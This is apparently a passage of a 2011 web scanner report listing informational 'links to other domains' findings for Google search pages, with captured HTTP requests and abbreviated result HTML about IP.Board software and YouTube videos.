<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ipboard+software&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCcQFjAB')">Community &amp; Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7ETs2caA0eMJ:www.invisionpower.com/+ipboard+software&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCkQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ipboard-software.software.informer.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CCwQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rwIJ10wJfloJ:ipboard-software.software.informer.com/+ipboard+software&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CC4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.julong.com.cn/en/News/188.html" class=l onmousedown="return clk(this.href,'','','','4','','0CC8QFjAD')">Release of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6zPAbdiM6HsJ:www.julong.com.cn/en/News/188.html+ipboard+software&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDEQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Invision_Power_Board" class=l onmousedown="return clk(this.href,'','','','5','','0CDMQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:L3-QgO6ibUgJ:en.wikipedia.org/wiki/Invision_Power_Board+ipboard+software&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDUQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.forum-software.org/tag/ipboard" class=l onmousedown="return clk(this.href,'','','','6','','0CDcQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qnHi427Jq2oJ:www.forum-software.org/tag/ipboard+ipboard+software&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CDkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://search.wareseeker.com/ip-board/" class=l onmousedown="return clk(this.href,'','','','7','','0CDoQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:y9-HsmKodEEJ:search.wareseeker.com/ip-board/+ipboard+software&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CD4QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.learningsolutions.com.hk/index.php?option=com_content&amp;task=view&amp;id=7&amp;Itemid=13" class=l onmousedown="return clk(this.href,'','','','8','','0CEAQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qPr5yokz3P8J:www.learningsolutions.com.hk/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D7%26Itemid%3D13+ipboard+software&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:qPr5yokz3P8J:www.learningsolutions.com.hk/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D7%26Itemid%3D13+ipboard+software&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com','','','','8','','0CEIQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.universalbot.com/supported-bots/forum-posting-bots/ipboard-software" class=l onmousedown="return clk(this.href,'','','','9','','0CEQQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:odF-vkzGMi8J:www.universalbot.com/supported-bots/forum-posting-bots/ipboard-software+ipboard+software&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CEYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.china-iwb.com/abcde/Editor/UploadFile/2009522165941674.pdf" class=l onmousedown="return clk(this.href,'','','','10','','0CEgQFjAJ')"><em>
...[SNIP]...

16.113. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=ipboard+software&hl=en&prmd=ivns&source=lnms&tbs=vid:1&ei=rtlJTei7OYL6lweT2cU3&sa=X&oi=mode_link&ct=mode&cd=3&ved=0CAgQ_AUoAg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:53 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software - Google Search</title><script>window.google={kEI:"rf9JTZC4MMGblgfi9YEF",kEXPI:"17259,1729
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&hl=en&prmd=ivns&um=1&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v8149251727845068733" href="/url?q=http://www.youtube.com/watch%3Fv%3DcRf1RRdxj70&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CDYQuAIwAA&amp;usg=AFQjCNG3YaXukF2ssMIYAlW20WjIZHL1Hg" ><img src="http://img.youtube.com/vi/cRf1RRdxj70/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=cRf1RRdxj70" class=l onmousedown="return clk(this.href,'','8149251727845068733','','1','','0CDUQtwIwAA')">Features of <em>
...[SNIP]...
<a id="v3629976629862535991" href="/url?q=http://www.youtube.com/watch%3Fv%3DMmBEgy3tEzc&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CDoQuAIwAQ&amp;usg=AFQjCNEaCVgW9C07LJlr_3Y305ikbnXk2w" ><img src="http://img.youtube.com/vi/MmBEgy3tEzc/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=MmBEgy3tEzc" class=l onmousedown="return clk(this.href,'','3629976629862535991','','2','','0CDkQtwIwAQ')">Demonstration of <em>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/user/learningsolutions&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CD4Q7gcwAg&amp;usg=AFQjCNEKRqo5CNMurGmM78MnDAMVmF0RXw"><img src="http://img.youtube.com/vi/sx-J2an7xB4/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s2 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/user/learningsolutions&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CD4Q7gcwAg&amp;usg=AFQjCNEKRqo5CNMurGmM78MnDAMVmF0RXw"><img src="http://img.youtube.com/vi/MmBEgy3tEzc/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s1 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/user/learningsolutions&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CD4Q7gcwAg&amp;usg=AFQjCNEKRqo5CNMurGmM78MnDAMVmF0RXw"><img src="http://img.youtube.com/vi/cRf1RRdxj70/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s0 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/user/learningsolutions" class=l onmousedown="return clk(this.href,'','8149251727845068733','','3','','0CD0QywgwAg')" title="YouTube - learningsolutions Channel: AsiaEdChannel">YouTube - learningsolutions Channel <b>
...[SNIP]...
<a id="v5320155016834284675" href="/url?q=http://www.youtube.com/watch%3Fv%3DSdT8zOhrfIM&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CEYQuAIwAw&amp;usg=AFQjCNGU-mNTNvILynPAr8mG3KU9WeCJ-A" ><img src="http://img.youtube.com/vi/SdT8zOhrfIM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=SdT8zOhrfIM" class=l onmousedown="return clk(this.href,'','5320155016834284675','','4','','0CEUQtwIwAw')">Installing <em>
...[SNIP]...
<h3 class=r><a href="http://vimeo.com/16007251" class=l onmousedown="return clk(this.href,'','8425468265280093136','','5','','0CEkQtwIwBA')"><em>
...[SNIP]...
<a id="v7704678877138600813" href="/url?q=http://www.youtube.com/watch%3Fv%3DauyEnhxNQ20&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CE4QuAIwBQ&amp;usg=AFQjCNFjMzlBxIeVYeOx4AAPIPd2jSqRtQ" ><img src="http://img.youtube.com/vi/auyEnhxNQ20/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb6 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=auyEnhxNQ20" class=l onmousedown="return clk(this.href,'','7704678877138600813','','6','','0CE0QtwIwBQ')">How to Install <em>
...[SNIP]...
<a id="v800285537859201395" href="/url?q=http://www.youtube.com/watch%3Fv%3DCxsvdOL66XM&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CFIQuAIwBg&amp;usg=AFQjCNHMaJBs5H43SjOMgLwr9-i5Tedqzg" ><img src="http://img.youtube.com/vi/CxsvdOL66XM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb7 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=CxsvdOL66XM" class=l onmousedown="return clk(this.href,'','800285537859201395','','7','','0CFEQtwIwBg')" title="HUGE MISTAKE by Invision Power Board: post icons are being deprecated">HUGE MISTAKE by <em>
...[SNIP]...
<a id="v1096890525267068370" href="/url?q=http://www.youtube.com/watch%3Fv%3DDzjwHwQJBdI&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CFYQuAIwBw&amp;usg=AFQjCNEpyVewR8oqYWfywAL4qnr_5_0H4w" ><img src="http://img.youtube.com/vi/DzjwHwQJBdI/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb8 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=DzjwHwQJBdI" class=l onmousedown="return clk(this.href,'','1096890525267068370','','8','','0CFUQtwIwBw')"><em>
...[SNIP]...
<a id="v8117288245030322593" href="/url?q=http://www.youtube.com/watch%3Fv%3DcKZmptB8gaE&amp;sa=X&amp;ei=rf9JTZC4MMGblgfi9YEF&amp;ved=0CFoQuAIwCA&amp;usg=AFQjCNHjLKbsS_lhGQZylvJri5TR8owcuw" ><img src="http://img.youtube.com/vi/cKZmptB8gaE/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb9 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=cKZmptB8gaE" class=l onmousedown="return clk(this.href,'','8117288245030322593','','9','','0CFkQtwIwCA')">How To Rip <em>
...[SNIP]...
<h3 class=r><a href="http://www.germanscooterforum.de/Forum_Support_f9/YouTube_Posting_einbinden_t124499.html" class=l onmousedown="return clk(this.href,'','4525591722281168178','','10','','0CF0QtwIwCQ')">YouTube in Posting einbinden</a>
...[SNIP]...

16.114. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search?hl=en&q=GMWJ_5AKtpypmg8&sa=X&oi=&ct=image&resnum=5&ved=0Csearch?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=bks:1&source=og&sa=N&tab=wp HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>GMWJ_5AKtpypmg8 p - Google Search</title><script>window.google={kEI:"vf9JTaWuD4WglAeusJHlDw",kEXPI:"17259,1
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&resnum=5&q=p&um=1&ie=UTF-8&sa=N&tab=p1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.115. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=ipboard+software&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&hl=en&tab=wv HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software - Google Search</title><script>window.google={kEI:"q_9JTc6xGYPGlQed84jYDw",kEXPI:"17259,17
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&um=1&hl=en&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v8149251727845068733" href="/url?q=http://www.youtube.com/watch%3Fv%3DcRf1RRdxj70&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CDYQuAIwAA&amp;usg=AFQjCNEzAiyFaDITiewKirckpnyKEtbUxw" ><img src="http://img.youtube.com/vi/cRf1RRdxj70/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=cRf1RRdxj70" class=l onmousedown="return clk(this.href,'','8149251727845068733','','1','','0CDUQtwIwAA')">Features of <em>
...[SNIP]...
<a id="v3629976629862535991" href="/url?q=http://www.youtube.com/watch%3Fv%3DMmBEgy3tEzc&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CDoQuAIwAQ&amp;usg=AFQjCNE4BB5oGAsXhoLKO5dtJ3MGHV1klQ" ><img src="http://img.youtube.com/vi/MmBEgy3tEzc/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=MmBEgy3tEzc" class=l onmousedown="return clk(this.href,'','3629976629862535991','','2','','0CDkQtwIwAQ')">Demonstration of <em>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/user/learningsolutions&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CD4Q7gcwAg&amp;usg=AFQjCNEt7cezJmVYKIe2_kPT9M-nP5ykMw"><img src="http://img.youtube.com/vi/sx-J2an7xB4/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s2 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/user/learningsolutions&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CD4Q7gcwAg&amp;usg=AFQjCNEt7cezJmVYKIe2_kPT9M-nP5ykMw"><img src="http://img.youtube.com/vi/MmBEgy3tEzc/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s1 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/user/learningsolutions&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CD4Q7gcwAg&amp;usg=AFQjCNEt7cezJmVYKIe2_kPT9M-nP5ykMw"><img src="http://img.youtube.com/vi/cRf1RRdxj70/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s0 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/user/learningsolutions" class=l onmousedown="return clk(this.href,'','8149251727845068733','','3','','0CD0QywgwAg')" title="YouTube - learningsolutions Channel: AsiaEdChannel">YouTube - learningsolutions Channel <b>
...[SNIP]...
<a id="v5320155016834284675" href="/url?q=http://www.youtube.com/watch%3Fv%3DSdT8zOhrfIM&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CEYQuAIwAw&amp;usg=AFQjCNGZNuGec4MAXAb6Qk7l_ElXqkGyRQ" ><img src="http://img.youtube.com/vi/SdT8zOhrfIM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=SdT8zOhrfIM" class=l onmousedown="return clk(this.href,'','5320155016834284675','','4','','0CEUQtwIwAw')">Installing <em>
...[SNIP]...
<h3 class=r><a href="http://vimeo.com/16007251" class=l onmousedown="return clk(this.href,'','8425468265280093136','','5','','0CEkQtwIwBA')"><em>
...[SNIP]...
<a id="v7704678877138600813" href="/url?q=http://www.youtube.com/watch%3Fv%3DauyEnhxNQ20&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CE4QuAIwBQ&amp;usg=AFQjCNEjYKf3RFRbfg5iUl5ynHc4hEWnUA" ><img src="http://img.youtube.com/vi/auyEnhxNQ20/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb6 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=auyEnhxNQ20" class=l onmousedown="return clk(this.href,'','7704678877138600813','','6','','0CE0QtwIwBQ')">How to Install <em>
...[SNIP]...
<a id="v800285537859201395" href="/url?q=http://www.youtube.com/watch%3Fv%3DCxsvdOL66XM&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CFIQuAIwBg&amp;usg=AFQjCNEhlERLjkfx60o_8LPBKKwyWMrN3Q" ><img src="http://img.youtube.com/vi/CxsvdOL66XM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb7 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=CxsvdOL66XM" class=l onmousedown="return clk(this.href,'','800285537859201395','','7','','0CFEQtwIwBg')" title="HUGE MISTAKE by Invision Power Board: post icons are being deprecated">HUGE MISTAKE by <em>
...[SNIP]...
<a id="v1096890525267068370" href="/url?q=http://www.youtube.com/watch%3Fv%3DDzjwHwQJBdI&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CFYQuAIwBw&amp;usg=AFQjCNFRaj_JPaBvy24lbe4tT3raqcXq1g" ><img src="http://img.youtube.com/vi/DzjwHwQJBdI/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb8 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=DzjwHwQJBdI" class=l onmousedown="return clk(this.href,'','1096890525267068370','','8','','0CFUQtwIwBw')"><em>
...[SNIP]...
<a id="v8117288245030322593" href="/url?q=http://www.youtube.com/watch%3Fv%3DcKZmptB8gaE&amp;sa=X&amp;ei=q_9JTc6xGYPGlQed84jYDw&amp;ved=0CFoQuAIwCA&amp;usg=AFQjCNHyI2Afx-P3XZ3kzuLlyPFunbpaqw" ><img src="http://img.youtube.com/vi/cKZmptB8gaE/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb9 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=cKZmptB8gaE" class=l onmousedown="return clk(this.href,'','8117288245030322593','','9','','0CFkQtwIwCA')">How To Rip <em>
...[SNIP]...
<h3 class=r><a href="http://www.germanscooterforum.de/Forum_Support_f9/YouTube_Posting_einbinden_t124499.html" class=l onmousedown="return clk(this.href,'','4525591722281168178','','10','','0CF0QtwIwCQ')">YouTube in Posting einbinden</a>
...[SNIP]...

16.116. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&tab=wv HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>p - Google Search</title><script>window.google={kEI:"vP9JTZ3VDIWglAffkZj6Dw",kEXPI:"17259,17291,27615,27683
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=p&um=1&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v1483871646885698228" href="/url?q=http://www.youtube.com/watch%3Fv%3DFJfFZqTlWrQ&amp;sa=X&amp;ei=vP9JTZ3VDIWglAffkZj6Dw&amp;ved=0CDEQuAIwAA&amp;usg=AFQjCNGd-6rT0oSQGdmvJ_QGdQIWEb_nSg" ><img src="http://img.youtube.com/vi/FJfFZqTlWrQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=FJfFZqTlWrQ" class=l onmousedown="return clk(this.href,'','1483871646885698228','','1','','0CDAQtwIwAA')"><em>
...[SNIP]...
<a id="v368787471398008195" href="/url?q=http://www.youtube.com/watch%3Fv%3DBR4yQFZK9YM&amp;sa=X&amp;ei=vP9JTZ3VDIWglAffkZj6Dw&amp;ved=0CDUQuAIwAQ&amp;usg=AFQjCNFgSQrZkerOH6S7vlmaPWgj_2nQog" ><img src="http://img.youtube.com/vi/BR4yQFZK9YM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=BR4yQFZK9YM" class=l onmousedown="return clk(this.href,'','368787471398008195','','2','','0CDQQtwIwAQ')"><em>
...[SNIP]...
<a id="v8829028052215966554" href="/url?q=http://www.youtube.com/watch%3Fv%3DeocCPDxKq1o&amp;sa=X&amp;ei=vP9JTZ3VDIWglAffkZj6Dw&amp;ved=0CDkQuAIwAg&amp;usg=AFQjCNGt3FGknhtirx11klVsijRtJWaSGg" ><img src="http://img.youtube.com/vi/eocCPDxKq1o/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=eocCPDxKq1o" class=l onmousedown="return clk(this.href,'','8829028052215966554','','3','','0CDgQtwIwAg')"><em>
...[SNIP]...
<a id="v4602705220286849378" href="/url?q=http://www.youtube.com/watch%3Fv%3DP-AYAv0IoWI&amp;sa=X&amp;ei=vP9JTZ3VDIWglAffkZj6Dw&amp;ved=0CD0QuAIwAw&amp;usg=AFQjCNFklmtP8soId3f9Ye1BmM2bcf6-Dg" ><img src="http://img.youtube.com/vi/P-AYAv0IoWI/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=P-AYAv0IoWI" class=l onmousedown="return clk(this.href,'','4602705220286849378','','4','','0CDwQtwIwAw')">Sweet Child O&#39; Mine Music Video</a>
...[SNIP]...
<h3 class=r><a href="http://www.spike.com/video/978359" class=l onmousedown="return clk(this.href,'','4121787078203026266','','5','','0CEAQtwIwBA')">A &amp; <em>
...[SNIP]...
<h3 class=r><a href="http://www.pp2g.tv/va396YnI_.aspx" class=l onmousedown="return clk(this.href,'','6939374973119908691','','6','','0CEQQtwIwBQ')">Pleasure <em>
...[SNIP]...
<h3 class=r><a href="http://vimeo.com/7743200" class=l onmousedown="return clk(this.href,'','11786434714553041377','','7','','0CEgQtwIwBg')" title="The Horsemen P-51 Mustang Flying Legends Duxford 2009">The Horsemen <em>
...[SNIP]...
<h3 class=r><a href="http://www.thedailyshow.com/watch/thu-may-14-2009/intro---p-is-for-protection" class=l onmousedown="return clk(this.href,'','9981952379210933981','','8','','0CEwQtwIwBw')">The Daily Show - 5/14/2009 - Intro - <em>
...[SNIP]...
<a id="v4910215729400831820" href="/url?q=http://www.youtube.com/watch%3Fv%3DRCSXMMF430w&amp;sa=X&amp;ei=vP9JTZ3VDIWglAffkZj6Dw&amp;ved=0CFEQuAIwCA&amp;usg=AFQjCNFLlIVxS5JiQR8ZuMDXgLC22rQyaw" ><img src="http://img.youtube.com/vi/RCSXMMF430w/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb9 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=RCSXMMF430w" class=l onmousedown="return clk(this.href,'','4910215729400831820','','9','','0CFAQtwIwCA')">El-<em>
...[SNIP]...
<h3 class=r><a href="http://www.southparkstudios.com/clips/185672" class=l onmousedown="return clk(this.href,'','4198850822176723815','','10','','0CFQQtwIwCQ')" title="P. Diddy&#39;s Ditty (Season 8, Episode 8) - Video Clips - ..."><em>
...[SNIP]...

16.117. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ipboard+software HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
